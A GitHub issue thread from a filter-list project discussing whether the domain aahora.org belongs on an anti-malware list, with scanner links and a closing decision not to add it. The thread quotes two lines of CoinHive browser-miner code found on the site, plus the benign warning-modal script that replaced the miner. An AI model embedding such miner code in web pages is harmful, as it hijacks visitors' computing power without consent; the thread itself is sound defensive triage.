Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Malware domain #190

Closed
1 of 8 tasks
iam-py-test opened this issue May 28, 2021 · 9 comments
Closed
1 of 8 tasks

Malware domain #190

iam-py-test opened this issue May 28, 2021 · 9 comments
Labels
Submission

Comments

@iam-py-test
Copy link
Collaborator

iam-py-test commented May 28, 2021
edited

Which entry/entries are you submitting?

aahora.org$all

Which things do they block, hide, or unbreak?

Malware.
See these for more information:
https://www.virustotal.com/gui/url/c5e388bc7c4f32f038e1ffaf055368c55b197251a9969c746a5f5ed7852f4ec4/detection
https://www.fortiguard.com/webfilter?q=aahora.org
https://safeweb.norton.com/report/show?url=aahora.org
https://www.urlvoid.com/scan/aahora.org/
https://quttera.com/detailed_report/aahora.org
https://sitecheck.sucuri.net/results/aahora.org
iam-py-test/my_filters_001@b0b68fb
https://quttera.com/detailed_report/coin-hive.com
https://www.virustotal.com/gui/url/993da527c38d30523da34f9bcf14e3b3b82ef7ce0c1a90604fedcff7587c7ecc/detection
https://www.virustotal.com/gui/domain/aahora.org/detection
https://www.virustotal.com/gui/domain/www.aahora.org/detection
https://www.virustotal.com/gui/url/9ff23b338f715e4c8ebeb2429c9145c3f433a9eb9d2a72fe3d62f3b80d133b27/detection
https://www.scumware.org/search.php (Complete the captcha and enter aahora.org to get results; strangely does not allow report to be linked)

The response: https://github.com/iam-py-test/Badware-Reports-1/blob/main/malware_page_content/malware_web20aahora.org.txt

Which of my lists are you submitting it to?

Antimalware

Which adblocker(s) and version did you use when writing and testing the entries?

  • uBlock Origin
  • AdGuard (Paid desktop version)
  • AdGuard (for browsers)
  • AdBlock
  • Adblock Plus
  • AdGuard Home
  • Blokada
  • I Don't Care About Cookies (The extension)

Other(s):

Adblocker version(s): uBlock Origin development build v1.35.3b7

Which filterlists did you use? Failing to tell this will temporarily close the report until it has been told.

(Optional) Which browser(s) and version did you use?

Edge Version 91.0.864.37
iam-py-test added a commit to iam-py-test/site-reports-001 that referenced this issue May 28, 2021
@iam-py-test
Add domain
f172ef6 
Add domain from iam-py-test/my_filters_001@b0b68fb and DandelionSprout/adfilt#190
@liamengland1
Copy link
Contributor

It looks like the official website of some sort of organization to me. Which part of the site is malicious? Is there a specific page?

https://www.facebook.com/fundacionahora/

@iam-py-test
Copy link
Collaborator Author

iam-py-test commented May 28, 2021
edited

It looks like the official website of some sort of organization to me. Which part of the site is malicious? Is there a specific page?

https://www.facebook.com/fundacionahora/

I looked at the Facebook link and it looked official. The whole thing is in another language so I am not sure what it says.
Maybe it got bought by someone else and is no longer malware, or is infected?
@DandelionSprout what do you think?

Which part of the site is malicious? Is there a specific page?

The scans flagged the homepage as having malware but most reported the host as malware too

@iam-py-test
Copy link
Collaborator Author

iam-py-test commented May 28, 2021
edited

Looking at the code, it seems like maybe it was flagged because of this:

var miner = new CoinHive.Anonymous('w9WpfXZJ9POkztDmNpey3zA1eq3I3Y2p', {throttle: 0.3});

Or this

<script src="https://coinhive.com/lib/coinhive.min.js"></script>

@iam-py-test
Copy link
Collaborator Author

iam-py-test commented May 28, 2021
edited

@llacb47 @DandelionSprout should I close this issue or do you think further investigation is needed?

@iam-py-test
Copy link
Collaborator Author

It looks like the CoinHive script at https://coinhive.com/lib/coinhive.min.js was replaced with another script:

// Credit to https://w3bits.com/javascript-modal/

let createModal = (modalContent) => {
  let modal = document.createElement('div'),
    modalStyle = document.createElement('style'),
    modalCSS = '.js-modal{ position: fixed; top: 50%; left: 50%; transform: translate(-50%, -50%); background-color: rgba(0, 0, 0, .8); width: 100%; height: 100%; z-index: 999999; } .js-modal-inner{ background-color: rgba(174, 145, 93, .9); position: relative; padding: 50px; font-size: 24px; max-width: 650px; top: 50%; left: 50%; transform: translate(-50%, -50%); color: #000; border-radius: 10px; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: normal; text-align: center; }  .js-modal-inner a { color: #000; text-decoration: underline; } .js-modal-close{ position: absolute; top: -10px; right: 0px; background-color: black; color: #eee; border-width: 0; font-size: 10px; height: 24px; width: 24px; border-radius: 100%; text-align: center; font-family: Arial; cursor: pointer;}',
    modalClose = '<button class="js-modal-close" id="js_modal_close">X</button>',
    theBody = document.getElementsByTagName('body')[0],
    theHead = document.getElementsByTagName('head')[0];

  // Add content and attributes to the modal
  modal.setAttribute('class', 'js-modal');
  modal.innerHTML = '<div class="js-modal-inner">' + modalContent + modalClose + '</div>';
  theBody.appendChild(modal);

  modalClose = document.querySelector('#js_modal_close');

  // Add the modal styles dynamically
  if(modalStyle.styleSheet){
    modalStyle.styleSheet.cssText = modalCSS;
  } else {
    modalStyle.appendChild(document.createTextNode(modalCSS));
  }
  theHead.appendChild(modalStyle);

  // Close the modal on button-click
  if(modalClose) {
    modalClose.addEventListener('click', function() {
      modal.remove();
      modalStyle.remove();
    });
  }
}

// Show it up when loading starts
window.addEventListener('load', function() {
  /* Remember to escape the characters to their respective valid HTML entities, for eg. ' will become \' */
  createModal('This website attempted to run a cryptominer in your browser. <a href="https://www.troyhunt.com/i-now-own-the-coinhive-domain-heres-how-im-fighting-cryptojacking-and-doing-good-things-with-content-security-policies">Click here for more information</a>.');
});

@iam-py-test
Copy link
Collaborator Author

Closing issue

iam-py-test added a commit to iam-py-test/my_filters_001 that referenced this issue May 28, 2021
@iam-py-test
Disable $all blocking
0f9d333 
DandelionSprout/adfilt#190
@DandelionSprout
Copy link
Owner

Fun fact: Microsoft Defender on my PC seemingly detects the scripts and script-lines above, as if my GitHub E-mail notifications with them are themselves CoinHive viruses. 😅

@DandelionSprout
Copy link
Owner

DandelionSprout commented May 29, 2021
edited

The site seems to be quasi-safe after Troy Hunt was able to deactivate CoinHive on that site, seemingly: https://www.troyhunt.com/i-now-own-the-coinhive-domain-heres-how-im-fighting-cryptojacking-and-doing-good-things-with-content-security-policies/

As such, I at least presume that there's no immediate need to add aahora.org to my list.

@iam-py-test
Copy link
Collaborator Author

The site seems to be quasi-safe after Troy Hunt was able to deactivate CoinHive on that site, seemingly: https://www.troyhunt.com/i-now-own-the-coinhive-domain-heres-how-im-fighting-cryptojacking-and-doing-good-things-with-content-security-policies/

As such, I at least presume that there's no immediate need to add aahora.org to my list.

Yes. I am sorry for the error; I did not realize that

@iam-py-test iam-py-test mentioned this issue Jun 1, 2021
Closed
8 tasks
iam-py-test added a commit to iam-py-test/my_filters_001 that referenced this issue Jun 12, 2021
@iam-py-test
Disable $all blocking
08383e9 
DandelionSprout/adfilt#190
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
Submission
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@liamengland1 @DandelionSprout @iam-py-test